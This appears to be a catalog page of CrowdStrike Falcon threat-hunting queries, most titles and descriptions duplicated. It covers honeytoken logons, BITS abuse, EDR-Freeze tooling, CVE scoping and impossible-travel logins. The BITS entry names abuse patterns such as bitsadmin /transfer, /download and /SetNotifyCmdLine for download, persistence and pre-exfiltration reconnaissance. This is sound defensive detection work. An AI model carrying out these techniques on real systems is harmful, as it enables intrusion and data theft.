EXPLORE DETECTIONS
Honeytoken Account Logon Activity
This query detects logon activity associated with a honeytoken account. Honeytokens are decoy accounts designed to lure attackers, and any activity on them is a strong indicator of compromise. ### Honeytoken Account Access Detection This use case is designed to generate an alert when any activity involving a designated **honeytoken account** is observed. Honeytokens serve as decoys; they are accounts that appear valuable to an attacker but have no legitimate purpose and are heavily monitored. Any interaction with them is highly indicative of malicious activity. **Key Objectives:** - **Lure Attackers**: Create accounts that mimic administrator or service accounts to attract adversarial engagement. - **High-Fidelity Alerts**: Since these accounts have no legitimate use, any logon event is a high-confidence signal of a breach. - **Monitor and Safeguard**: Apply Identity Protection policies to monitor these accounts without granting them any actual permissions, making them safe and effective traps. --- #### Query Breakdown: 1. **`#event_simpleName=/UserLogon.*/i`** - This line filters for all logon-related events captured by CrowdStrike Falcon. It serves as the primary data source for the detection. 2. **`| UserSid = /S-1-5-21-\d*-\d*-\d*-500/i`** - This filters the logon events for a specific Security Identifier (SID). The SID `S-1-5-21-...-500` is the well-known SID for the default local administrator account on a Windows domain. - **Crucially**, this value must be replaced with the actual SID(s) of your organization's designated honeytoken accounts. For more details on creating and managing honeytokens within Falcon Identity Protection, please refer to the official CrowdStrike documentation: - [Honeytokens within Falcon Identity Protection](https://supportportal.crowdstrike.com/s/article/ka16T000001MfykQAC)
Honeytoken Account Logon Activity
This query detects logon activity associated with a honeytoken account. Honeytokens are decoy accounts designed to lure attackers, and any activity on them is a strong indicator of compromise. ### Honeytoken Account Access Detection This use case is designed to generate an alert when any activity involving a designated **honeytoken account** is observed. Honeytokens serve as decoys; they are accounts that appear valuable to an attacker but have no legitimate purpose and are heavily monitored. Any interaction with them is highly indicative of malicious activity. **Key Objectives:** - **Lure Attackers**: Create accounts that mimic administrator or service accounts to attract adversarial engagement. - **High-Fidelity Alerts**: Since these accounts have no legitimate use, any logon event is a high-confidence signal of a breach. - **Monitor and Safeguard**: Apply Identity Protection policies to monitor these accounts without granting them any actual permissions, making them safe and effective traps. --- #### Query Breakdown: 1. **`#event_simpleName=/UserLogon.*/i`** - This line filters for all logon-related events captured by CrowdStrike Falcon. It serves as the primary data source for the detection. 2. **`| UserSid = /S-1-5-21-\d*-\d*-\d*-500/i`** - This filters the logon events for a specific Security Identifier (SID). The SID `S-1-5-21-...-500` is the well-known SID for the default local administrator account on a Windows domain. - **Crucially**, this value must be replaced with the actual SID(s) of your organization's designated honeytoken accounts. For more details on creating and managing honeytokens within Falcon Identity Protection, please refer to the official CrowdStrike documentation: - [Honeytokens within Falcon Identity Protection](https://supportportal.crowdstrike.com/s/article/ka16T000001MfykQAC)
Hunt for a file name
Hunt for a file name
Hunt for specific Command Line Activity
Hunt for specific Command Line Activity
Hunting Bitsadmin usage
This query implements a multi-hypothesis threat hunting workflow to detect abuse of the Windows Background Intelligent Transfer Service (BITS). It uses a case statement to classify incoming telemetry into four distinct detection hypotheses. H1 catches direct execution of bitsadmin.exe with suspicious command-line arguments (such as /transfer, /addfile, /download, /SetNotifyCmdLine, or URLs) while excluding legitimate parent processes like svchost.exe and msiexec.exe. H2 detects PowerShell-based BITS abuse by scanning script block logging and command history events for cmdlets like Start-BitsTransfer or direct COM object invocation (BITS.IBackgroundCopyManager) combined with network-related parameters. H3 focuses specifically on BITS persistence mechanisms by flagging commands that set notification callbacks (SetNotifyCmdLine), retry delays, or timeout values excluding legitimate Windows Update activity. H4 identifies proxy reconnaissance via bitsadmin /getieproxy, a technique attackers use to discover proxy configurations before exfiltrating data.
Hunting Bitsadmin usage
This query implements a multi-hypothesis threat hunting workflow to detect abuse of the Windows Background Intelligent Transfer Service (BITS). It uses a case statement to classify incoming telemetry into four distinct detection hypotheses. H1 catches direct execution of bitsadmin.exe with suspicious command-line arguments (such as /transfer, /addfile, /download, /SetNotifyCmdLine, or URLs) while excluding legitimate parent processes like svchost.exe and msiexec.exe. H2 detects PowerShell-based BITS abuse by scanning script block logging and command history events for cmdlets like Start-BitsTransfer or direct COM object invocation (BITS.IBackgroundCopyManager) combined with network-related parameters. H3 focuses specifically on BITS persistence mechanisms by flagging commands that set notification callbacks (SetNotifyCmdLine), retry delays, or timeout values excluding legitimate Windows Update activity. H4 identifies proxy reconnaissance via bitsadmin /getieproxy, a technique attackers use to discover proxy configurations before exfiltrating data.
Hunting EDR Freeze
Based on the default command line switching behavior found in the EDR-Freeze open source project: https://github.com/TwoSevenOneT/EDR-Freeze?tab=readme-ov-file
Hunting EDR Freeze
Based on the default command line switching behavior found in the EDR-Freeze open source project: https://github.com/TwoSevenOneT/EDR-Freeze?tab=readme-ov-file
Identify Linux Systems Vulnerable to CVE-2025-1146 with Last Logged-On User Information
The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the event OsVersionInfo which is generated every 24-hours, at sensor start, or at sensor update. It attempts to merge in LogonType 2 and 10 to determine the last logged on user. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/CVE-2025-1146%20System%20Scoping%20(OsVersionInfo%20with%20Logon%20Data).md)
Identify Linux Systems Vulnerable to CVE-2025-1146 with Last Logged-On User Information
The query below will look for Linux systems (Linux, K8, Containers) that need to be updated against CVE-2025-1146. The query is based on the event OsVersionInfo which is generated every 24-hours, at sensor start, or at sensor update. It attempts to merge in LogonType 2 and 10 to determine the last logged on user. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/CVE-2025-1146%20System%20Scoping%20(OsVersionInfo%20with%20Logon%20Data).md)
Identify Shadow SaaS
This query identifies SaaS services supported by Falcon Shield and helps detect which SaaS products are actively used within the environment.
Identify Shadow SaaS
This query identifies SaaS services supported by Falcon Shield and helps detect which SaaS products are actively used within the environment.
Identity Protection - Average Cloud Response Time
Average time (in seconds) the cloud service takes to resolve entity information (e.g., from SID/GUID). Latency above 3 seconds may cause intermittent issues; above 4 seconds can lead to recurring timeouts.
Identity Protection - Average Cloud Response Time
Average time (in seconds) the cloud service takes to resolve entity information (e.g., from SID/GUID). Latency above 3 seconds may cause intermittent issues; above 4 seconds can lead to recurring timeouts.
Impossible Travel Time Azure
Tracing Logins from two different countries with impossible travel times between consecutive logins per identity Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/Impossible-Travel-Time-Azure.md)
Impossible Travel Time Azure
Tracing Logins from two different countries with impossible travel times between consecutive logins per identity Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/Impossible-Travel-Time-Azure.md)
Inspected LDAP / Kerberos / DCE/RCP Traffic
Shows inspected traffic requests over time on the selected domain controller
Inspected LDAP / Kerberos / DCE/RCP Traffic
Shows inspected traffic requests over time on the selected domain controller
Installed Browser Extensions (Aggregate by Extension)
This query will output a table with all installed browser extensions.
Installed Browser Extensions (Aggregate by Extension)
This query will output a table with all installed browser extensions.
Installed Browser Extensions (Hunt Extension Name)
This query will output a table with all installed browser extensions. Replace "vpn" with the string you want to hunt for.
Installed Browser Extensions (Hunt Extension Name)
This query will output a table with all installed browser extensions. Replace "vpn" with the string you want to hunt for.